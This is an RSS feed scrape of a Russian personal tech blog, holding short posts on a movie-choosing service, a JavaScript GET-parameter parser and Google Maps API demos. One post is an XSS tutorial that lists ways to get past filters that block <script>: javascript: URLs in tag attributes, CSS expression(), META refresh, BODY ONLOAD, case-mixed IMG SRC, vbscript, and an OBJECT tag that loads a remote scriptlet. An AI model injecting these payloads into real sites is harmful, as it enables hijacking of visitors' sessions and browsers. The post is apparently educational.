Creotiv lives here » javascript http://creotiv.in.ua Блог Андрея Никишаева об IT, менеджменте, SEO и фотографии Thu, 26 Apr 2012 13:23:05 +0000 ru hourly 1 http://wordpress.org/?v=3.2.1 What to watch – service that helps in choosing movies http://creotiv.in.ua/%d0%be%d1%81%d1%82%d0%b0%d0%bb%d1%8c%d0%bd%d0%be%d0%b5/what-to-watch-service-that-helps-in-choosing-movies/ http://creotiv.in.ua/%d0%be%d1%81%d1%82%d0%b0%d0%bb%d1%8c%d0%bd%d0%be%d0%b5/what-to-watch-service-that-helps-in-choosing-movies/#comments Tue, 03 Jan 2012 10:00:59 +0000 Андрей Никишаев http://creotiv.in.ua/?p=2005

I think many people often ask themselves with the question “What to Watch”. There are many movies and some of them you already watched and some not, so to choose movie that you want to watch can be really hard and take much time.

I was one of this people, and i’m sick of this, so i created service that helps you to choose right movie faster then you can imagine. Checked it on myself and must say it can really save much time.

So check it now:  What to Watch?

Я думаю, многие люди часто задают себе вопрос ”Что посмотреть вечером”. Есть много фильмов и некоторые из них вы уже видели, а некоторые нет, так что выбрать фильм  может быть достаточно трудно и займет немало времени.

Я был одним из этих людей, и я устал от того что порой тратил пару часов на выбор фильма, так что я создал сервис, который поможет выбрать фильм быстрее, чем вы можете себе представить. Проверено на себе и должен сказать, это действительно экономит много время и нервы.

What to Watch?


]]> http://creotiv.in.ua/%d0%be%d1%81%d1%82%d0%b0%d0%bb%d1%8c%d0%bd%d0%be%d0%b5/what-to-watch-service-that-helps-in-choosing-movies/feed/ 0 Parse GET params with JavaScript as Object http://creotiv.in.ua/%d0%bf%d1%80%d0%be%d0%b3%d1%80%d0%b0%d0%bc%d0%bc%d0%b8%d1%80%d0%be%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5/parse-get-params-with-javascript-as-object/ http://creotiv.in.ua/%d0%bf%d1%80%d0%be%d0%b3%d1%80%d0%b0%d0%bc%d0%bc%d0%b8%d1%80%d0%be%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5/parse-get-params-with-javascript-as-object/#comments Fri, 10 Jun 2011 15:23:08 +0000 Андрей Никишаев http://creotiv.in.ua/?p=1933 Usage: var get_params = $_GET(location.href);

function $_GET(s){
  a = s.match(/[^&?=]*=[^&?=]*/g);
  r = {};
  for (i=0; i<a.length; i++) {
  	r[a[i].match(/[^&?=]*/)[0]] = a[i].match(/=([^&?]*)/)[0].replace('=', '');
  }
  return(r);
}
]]> http://creotiv.in.ua/%d0%bf%d1%80%d0%be%d0%b3%d1%80%d0%b0%d0%bc%d0%bc%d0%b8%d1%80%d0%be%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5/parse-get-params-with-javascript-as-object/feed/ 0 XSS когда <script> фильтруется http://creotiv.in.ua/%d0%b1%d0%b5%d0%b7%d0%be%d0%bf%d0%b0%d1%81%d0%bd%d0%be%d1%81%d1%82%d1%8c/xss-%d0%ba%d0%be%d0%b3%d0%b4%d0%b0-%d1%84%d0%b8%d0%bb%d1%8c%d1%82%d1%80%d1%83%d0%b5%d1%82%d1%81%d1%8f/ http://creotiv.in.ua/%d0%b1%d0%b5%d0%b7%d0%be%d0%bf%d0%b0%d1%81%d0%bd%d0%be%d1%81%d1%82%d1%8c/xss-%d0%ba%d0%be%d0%b3%d0%b4%d0%b0-%d1%84%d0%b8%d0%bb%d1%8c%d1%82%d1%80%d1%83%d0%b5%d1%82%d1%81%d1%8f/#comments Thu, 06 Jan 2011 10:31:07 +0000 Андрей Никишаев http://creotiv.in.ua/?p=1745 Как Вы, наверное, уже поняли, XSS используется не только для вывода сообщений. В основном при XSS-атаке используется JavaScript. Большинство начинающих программистов очень боятся тега <script> и поэтому жёстко его фильтруют.
Но кто сказал, что XSS можно провести только через тег <script>? Даже если он фильтруется, есть ещё целое море тегов, через которые можно провести XSS.

Вот пример , который выводит сообщение “Я здесь был”:

alert(‘Я здесь был’)

Сейчас мы будем рассматривать только этот вариант (вывод сообщения), просто для лёгкости понимания. Итак, начнём.

Все теги, в которых проводятся XSS, делятся на 2 большие группы
1. Теги, которые работают только с браузером Internet Explorer. (то есть “правильно” обрабатываются только им).
2. Теги, которые нормально работают с остальными браузерами.

Для начала рассмотрим теги, которые правильно обрабатываются IE (т.к. на данный момент он самый популярный).

1. <TABLE>. Данный тег используется для создания таблиц. У этого тега есть свойство BACKGROUND, отвечающее за фон таблицы. Опасность этого тега в том, что за место фона можно ввести код на JavaScript следующим образом:

<TABLE BACKGROUND="javascript:alert('Я здесь был')">

2. <DIV>. Данный тег служит контейнером для внутреннего текста. К тексту, который находится внутри тегов <div></div>, может быть применён определённый стиль (CSS). Вот пример использования данного тега для XSS атаки:

<DIV STYLE="background-image: url(javascript:alert('Я здесь был'))">

Как видите, здесь мы используем вставку кода в параметр STYLE. Но есть и ещё один вариант использования данного тега. Не с помощью функции url(), а через функцию expression():

<DIV STYLE="width: expression(alert('Я здесь был '));">

В данном случае тоже используется параметр STYLE.

3. <STYLE>. Данный тег задает правила оформления и форматирования элементов, находящихся внутри тегов <STYLE></STYLE>. Вот 2 варианта использования XSS:

<STYLE>.XSS{background-image:url("javascript:alert('Я здесь был ')");}</STYLE><A></A>

Здесь происходит следующее действие – сначала объявляется класс XSS(в нём расположен XSS- код), а затем он вызывается с помощью

<A></A>

Второй вариант:

<STYLE> type="text/css">BODY{background:url("javascript:alert(‘Я здесь был’)")} </STYLE>

В этом варианте наш XSS-код указывается как фоновое изображение странички.

4. <BGSOUND>. Данный тег используется для указания фонового звука странички. Но за место звукового файла можно указать и код JavaScript

<BGSOUND SRC="javascript:alert(‘Я здесь был’);">

5. <IMG>. Этот тег используется для вставки изображений на страничку. 2 свойства этого тега обрабатывается только Internet Explorer’ом. Это свойства DYNSRC и LOWSRC. В их значении может быть указан код скрипта.

<IMG DYNSRC="javascript:alert(‘Я здесь был’)">
<IMG LOWSRC="javascript:alert(‘Я здесь был’)">

Таким же образом можно указать код в свойстве SRC. Это свойство обрабатывается всеми браузерами. Про него будет рассказано ниже.

6. <OBJECT>. Данный тег внедряет определённый объект в html-страницу. Лично я ни в одном учебнике не видел какого-либо материала о внедрение удалённых объектов, только тех, которые находятся уже в коде странички. Но вставка удалённого JavaScript кода возможна следующим способом:

<OBJECT TYPE="text/x-scriptlet" DATA="http://www.site.com/test.html">   </OBJECT>

Тут мы указали url странички на которой может находиться опасный код, к тому же этот тег может использоваться для заражения множества клиентов. Не будут же взломщики вставлять в своё сообщение код Трояна на JavaScript. Им проще будет поставить на него ссылку, и разместить код Трояна на другой странице. При загрузке страницы, код трояна будет загружаться с другого сайта. Это облегчает задачу когда через XSS пытаются заразить пользователей нескольких сайтов.

Давайте теперь рассмотрим теги которые обрабатываются всеми браузерами.
1. <META>. META-теги чаще всего используются для индексирования страницы поисковиками, но нам нужно не это. У META-тегов есть свойство refresh, где в свойстве CONTENT можно указать произвольный код:

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

2. <BODY>. Всем известный тег. У него есть свойство OnLoad, которое выполняется при загрузке. В это свойство можно вставить код на JavaScript следующим образом:

<BODY ONLOAD=alert('XSS')>

Код будет срабатывать при каждой загрузке страницы. Чаще всего люди думают что тег <BODY> может встречаться в документе только один раз. Это не верное мнение. Вот пример нормальной работы XSS:

<html>
<head>
</head>
<body>
<body OnLoad=alert('XSS')>
 </body>
</html>

Следовательно, запись <BODY ONLOAD=alert(‘XSS’)> может быть вставлена в любом участке станицы. И ещё один вариант применения:

<BODY BACKGROUND="javascript:alert('XSS')" >

3. <IMG>. О данном теге было рассказано выше, но сейчас я хочу описать некоторые способы обхода фильтрации, т.к. иногда этот тег разрешён, но фильтруется записи типа “javascript”. Для проведения XSS может использоваться свойство SRC:

<IMG SRC=”javascript:alert(‘XSS’)”>

Но что делать, если имеется фильтрация ? Если фильтрация идёт по признаку “javascript:” , то можно попробовать обойти её следующим способом:

<IMG SRC=”JAVAScRiPt:alert('XSS')”>

Вот ещё несколько вариантов

<IMG SRC=javascript:alert('XSS')>

(вариант без двойных ковычек)

<IMG SRC=javascript:alert("XSS")>

(вариант вообще без каких-либо кавычек)

<IMG SRC="   javascript:alert('XSS');">

(если фильтрация идёт по элементу ”javascript, данный вариант работает и без кавычек)

Так же можно использовать VBScript:

<IMG SRC='vbscript:msgbox("Я здесь был")'>

4. <STYLE>. О данном теге тоже говорилось ниже, но только для IE.
Вот вариант который работает во всех браузерах:

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

И на последок несколько причин неработоспособности XSS:
1. XSS с тегами <IMG> не работают в браузере FireFox
2. У клиента JavaScript может блокироваться брандмауэром или браузером(очень редко).
3. У клиента может блокироваться VBScript.
4. У клиента могу блокироваться внешние объекты (помешает загрузке скриптов с другого сайта).

Более полный список можно найти сдесь: http://ha.ckers.org/xss.html

]]> http://creotiv.in.ua/%d0%b1%d0%b5%d0%b7%d0%be%d0%bf%d0%b0%d1%81%d0%bd%d0%be%d1%81%d1%82%d1%8c/xss-%d0%ba%d0%be%d0%b3%d0%b4%d0%b0-%d1%84%d0%b8%d0%bb%d1%8c%d1%82%d1%80%d1%83%d0%b5%d1%82%d1%81%d1%8f/feed/ 0 Пример Google Maps API Часть 2 http://creotiv.in.ua/%d0%bf%d1%80%d0%be%d0%b3%d1%80%d0%b0%d0%bc%d0%bc%d0%b8%d1%80%d0%be%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5/%d0%bf%d1%80%d0%b8%d0%bc%d0%b5%d1%80-google-maps-api-%d1%87%d0%b0%d1%81%d1%82%d1%8c-2/ http://creotiv.in.ua/%d0%bf%d1%80%d0%be%d0%b3%d1%80%d0%b0%d0%bc%d0%bc%d0%b8%d1%80%d0%be%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5/%d0%bf%d1%80%d0%b8%d0%bc%d0%b5%d1%80-google-maps-api-%d1%87%d0%b0%d1%81%d1%82%d1%8c-2/#comments Thu, 24 Sep 2009 16:13:12 +0000 Андрей Никишаев http://creotiv.in.ua/?p=879 Часть 1

Короче немного доделал этот примерчик. Появились следующие фичи:

  • Добавление списка меток(возможность переключатся на метки через список)
  • Удаление меток(в том числе и через список)
  • Добавлен поиск с учетом ограничения сектора
  • Добавлены подсказки для поиска при множественном совпадении

В планах сделать:

  • Редактирование меток
  • Переделать UI(Есть небольшие глюки)
  • Добавить поиск по списку меток
  • Добавить категории для меток
  • Написать бек-энд для хранения всей инфы, включая разделение на пользователи.

Сам пример смотреть здесь

]]> http://creotiv.in.ua/%d0%bf%d1%80%d0%be%d0%b3%d1%80%d0%b0%d0%bc%d0%bc%d0%b8%d1%80%d0%be%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5/%d0%bf%d1%80%d0%b8%d0%bc%d0%b5%d1%80-google-maps-api-%d1%87%d0%b0%d1%81%d1%82%d1%8c-2/feed/ 0 Пример Google Maps API http://creotiv.in.ua/%d0%bf%d1%80%d0%be%d0%b3%d1%80%d0%b0%d0%bc%d0%bc%d0%b8%d1%80%d0%be%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5/%d0%bf%d1%80%d0%b8%d0%bc%d0%b5%d1%80-google-maps-api/ http://creotiv.in.ua/%d0%bf%d1%80%d0%be%d0%b3%d1%80%d0%b0%d0%bc%d0%bc%d0%b8%d1%80%d0%be%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5/%d0%bf%d1%80%d0%b8%d0%bc%d0%b5%d1%80-google-maps-api/#comments Sat, 12 Sep 2009 13:27:17 +0000 Андрей Никишаев http://creotiv.in.ua/?p=859 Вчера копался с Google Maps API, так как выяснил, что они наконец то добавили карту Киева(до этого юзал Mapia, но там API шо из задницы). Решил вот сделать небольшой примерчик ее использования.

В примере расмотренно:

  • Ограничение области показа карты
  • Ограничение увеличения в зависимости от типа карты
  • Настройка UI
  • Добавление собственых контролов
  • Работа с урл(парсинг координат в урл и обратно)
  • Поддержка истории
  • Работа с событиями
  • Работа с маркерами и менеджером маркеров

Код выкладывать небуду по ненадобности, заходим и жмем Ctrl + U (и код ваш)

Зырим здесь

]]> http://creotiv.in.ua/%d0%bf%d1%80%d0%be%d0%b3%d1%80%d0%b0%d0%bc%d0%bc%d0%b8%d1%80%d0%be%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5/%d0%bf%d1%80%d0%b8%d0%bc%d0%b5%d1%80-google-maps-api/feed/ 1